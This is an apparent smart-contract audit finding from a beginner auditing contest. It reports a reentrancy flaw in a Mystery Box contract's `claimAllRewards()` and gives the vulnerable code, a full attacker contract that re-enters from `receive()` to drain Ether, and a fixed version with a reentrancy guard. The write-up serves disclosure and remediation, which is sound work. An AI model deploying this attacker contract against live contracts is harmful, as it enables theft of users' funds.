Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: high
Valid

REENTRANCY VULNERABILITY IN THE `claimAllRewards()` FUNCTION

Summary:

The bug occurs because `claimAllRewards()` sends Ether to the caller with a low-level `call` before it updates state: `rewardsOwned[msg.sender]` is deleted only after the transfer returns. A contract receiving the Ether can therefore re-enter `claimAllRewards()` from its `receive()`/`fallback()` function and be paid for the same rewards again.

Vulnerability Details:

```solidity
function claimAllRewards() public {
    uint256 totalValue = 0;
    for (uint256 i = 0; i < rewardsOwned[msg.sender].length; i++) {
        totalValue += rewardsOwned[msg.sender][i].value;
    }
    require(totalValue > 0, "No rewards to claim");

    // Interaction before effect: control passes to msg.sender here while
    // rewardsOwned[msg.sender] is still intact.
    (bool success,) = payable(msg.sender).call{value: totalValue}("");
    require(success, "Transfer failed");

    // State is only cleared after the external call has returned.
    delete rewardsOwned[msg.sender];
}
```

Impact:

An attacker can re-enter `claimAllRewards()` to drain the contract's Ether, leaving it unable to pay legitimate claimants (a denial of service for every other user).

  1. The attacker calls `claimAllRewards()` from a contract whose `receive()` function calls `claimAllRewards()` again while the first call is still waiting on the external `call`.
  2. Because `delete rewardsOwned[msg.sender]` runs only after the external call returns, the nested call sees the same unchanged rewards array, passes the `totalValue > 0` check and transfers the same amount again.
  3. The attacker repeats this until the contract's balance drops below one payout, then lets the nested calls unwind; each frame then deletes the (already drained) rewards array.
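A proof-of-concept attacker contract for the sequence above, added here as an illustration; it is not part of the original submission or of the Mystery Box code base. The `IMysteryBox` interface name, the `attack()`/`withdraw()` helpers, the `owner` field and the precondition that the attacker contract already holds rewards are assumptions; only `claimAllRewards()` comes from the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Assumed minimal interface of the target. The finding shows only
// claimAllRewards(); the real contract name and how rewards are obtained
// are not part of this example.
interface IMysteryBox {
    function claimAllRewards() external;
}

/// @notice Re-enters claimAllRewards() from receive().
/// The target deletes rewardsOwned[msg.sender] only after its external call
/// returns, so every nested call re-reads the same array and pays out again.
contract ReentrancyAttacker {
    IMysteryBox public immutable target;
    address public immutable owner;
    uint256 public payout;     // value of one legitimate claim, learned on first payment
    uint256 public reentries;  // how many times receive() re-entered the target

    constructor(address _target) {
        target = IMysteryBox(_target);
        owner = msg.sender;
    }

    /// @dev Precondition (assumed): this contract already holds at least one
    /// reward in the target, e.g. by having bought and opened a box.
    function attack() external {
        require(msg.sender == owner, "not owner");
        payout = 0;
        reentries = 0;
        target.claimAllRewards();
    }

    receive() external payable {
        // The first payment reveals the per-claim amount.
        if (payout == 0) payout = msg.value;

        // Re-enter only while the target can still cover a full payout;
        // otherwise the nested transfer would fail and revert the whole chain
        // through the target's require(success).
        if (address(target).balance >= payout) {
            reentries++;
            target.claimAllRewards();
        }
        // Once the balance is too low, the nested calls unwind and each frame
        // executes `delete rewardsOwned[msg.sender]` on an already drained array.
    }

    function withdraw() external {
        require(msg.sender == owner, "not owner");
        payable(owner).transfer(address(this).balance);
    }
}
```

Deploy the attacker, give it rewards in the target the same way any user would obtain them, then call `attack()`; `reentries` records how many extra payouts were obtained before the target's balance ran out.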

Tools Used:

   Aderyn and Slither.

Recommendations:

  Follow checks-effects-interactions: move `delete rewardsOwned[msg.sender];` before the external `call`, so a re-entrant call sees an empty array and reverts on `require(totalValue > 0, ...)`.
  Add a reentrancy guard (for example OpenZeppelin's `ReentrancyGuard` with the `nonReentrant` modifier) as defence in depth.
  Replacing `call()` with `send()` or `transfer()` only limits the recipient to the 2300 gas stipend. That blocks this particular re-entry today but is not a reliable fix, because opcode gas costs have changed before (EIP-1884) and contract wallets may legitimately need more gas to receive Ether; fixing the ordering is the real remedy.
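A hardened version of the function applying the recommendations above, added here as an example and not taken from the Mystery Box code base. The `Reward` struct (with its `name` field), the `MysteryBoxFixed` contract name, the hand-rolled mutex used in place of OpenZeppelin's `ReentrancyGuard`, and the `grantForDemo()` helper that exists only so the function can be exercised locally are assumptions; `rewardsOwned`, `.value` and `claimAllRewards()` are as shown in the finding.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract MysteryBoxFixed {
    // Assumed shape: the finding only shows an array of structs with a
    // `value` field per address.
    struct Reward {
        string name;
        uint256 value;
    }

    mapping(address => Reward[]) public rewardsOwned;

    // Minimal mutex, same idea as OpenZeppelin's ReentrancyGuard.
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "Reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    // Demo-only helper so the claim path can be tested in isolation; a real
    // contract would award rewards when a box is opened and must not expose
    // an unrestricted function like this.
    function grantForDemo(address to, uint256 value) external payable {
        require(msg.value == value, "fund the reward");
        rewardsOwned[to].push(Reward("demo", value));
    }

    function claimAllRewards() public nonReentrant {
        // Checks
        Reward[] storage rewards = rewardsOwned[msg.sender];
        uint256 totalValue = 0;
        for (uint256 i = 0; i < rewards.length; i++) {
            totalValue += rewards[i].value;
        }
        require(totalValue > 0, "No rewards to claim");

        // Effects: clear the caller's rewards before handing over control.
        delete rewardsOwned[msg.sender];

        // Interactions last. A re-entrant call now either trips the mutex or
        // sees an empty array and reverts; that revert propagates into the
        // attacker's receive(), makes this call return success == false and
        // reverts the whole transaction, so the attacker gets nothing.
        (bool success,) = payable(msg.sender).call{value: totalValue}("");
        require(success, "Transfer failed");
    }

    receive() external payable {}
}
```

Either defence alone stops the attack; keeping both means a future refactor that reorders the statements does not silently reintroduce the bug.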
Updates

Lead Judging Commences

inallhonesty Lead Judge about 1 year ago

Appeal created

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

`claimAllRewards` reentrancy
